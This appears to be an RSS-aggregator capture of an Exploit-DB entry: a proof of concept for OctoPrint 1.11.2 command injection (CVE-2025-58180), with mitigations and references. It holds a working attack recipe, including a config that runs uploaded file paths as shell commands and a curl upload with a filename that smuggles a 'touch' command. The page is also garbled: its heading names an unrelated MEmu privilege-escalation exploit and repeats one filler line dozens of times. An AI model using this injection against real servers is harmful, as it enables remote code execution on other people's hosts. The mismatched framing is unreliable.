惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

L
LangChain Blog
C
Check Point Blog
博客园 - Franky
V
Visual Studio Blog
云风的 BLOG
云风的 BLOG
aimingoo的专栏
aimingoo的专栏
Microsoft Security Blog
Microsoft Security Blog
V2EX - 技术
V2EX - 技术
AI
AI
Hacker News - Newest:
Hacker News - Newest: "LLM"
Jina AI
Jina AI
S
Security @ Cisco Blogs
Security Archives - TechRepublic
Security Archives - TechRepublic
H
Hacker News: Front Page
H
Hackread – Cybersecurity News, Data Breaches, AI and More
O
OpenAI News
Attack and Defense Labs
Attack and Defense Labs
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
爱范儿
爱范儿
H
Heimdal Security Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
G
Google Developers Blog
G
GRAHAM CLULEY
V
V2EX
The Register - Security
The Register - Security
人人都是产品经理
人人都是产品经理
B
Blog RSS Feed
Schneier on Security
Schneier on Security
M
MIT News - Artificial intelligence
Stack Overflow Blog
Stack Overflow Blog
Help Net Security
Help Net Security
大猫的无限游戏
大猫的无限游戏
C
CERT Recently Published Vulnerability Notes
The GitHub Blog
The GitHub Blog
V
Vulnerabilities – Threatpost
The Last Watchdog
The Last Watchdog
J
Java Code Geeks
S
Secure Thoughts
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
量子位
NISL@THU
NISL@THU
K
Kaspersky official blog
Engineering at Meta
Engineering at Meta
T
Threatpost
Recent Commits to openclaw:main
Recent Commits to openclaw:main
宝玉的分享
宝玉的分享
Security Latest
Security Latest
T
The Exploit Database - CXSecurity.com
博客园_首页
A
Arctic Wolf

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
prabhat · 2026-02-04 · via Exploit-DB.com RSS Feed
# Exploit Title: OctoPrint 1.11.2 - File Upload 
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.